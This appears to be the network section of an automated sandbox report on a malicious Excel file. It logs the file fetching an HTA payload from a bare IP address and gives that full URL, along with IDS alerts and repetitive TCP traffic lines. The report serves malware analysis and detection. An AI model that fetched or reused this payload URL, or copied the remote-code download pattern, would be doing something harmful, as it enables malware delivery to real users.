Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49732
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 192.168.2.4:49735 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49735
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.4:49734
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.4:49729
Source: excel.exeMemory has grown: Private usage: 2MB later: 171MB
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 13.107.246.60:443
Source: global trafficHTTP traffic detected: GET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 198.12.89.24Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 198.12.89.24Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 15 Mar 2025 08:08:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 298Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 31 32 2e 38 39 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.12.89.24 Port 80</address></body></html>
Source: PO-ARJ-2025-15ACA.xla.xlsxString found in binary or memory: http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
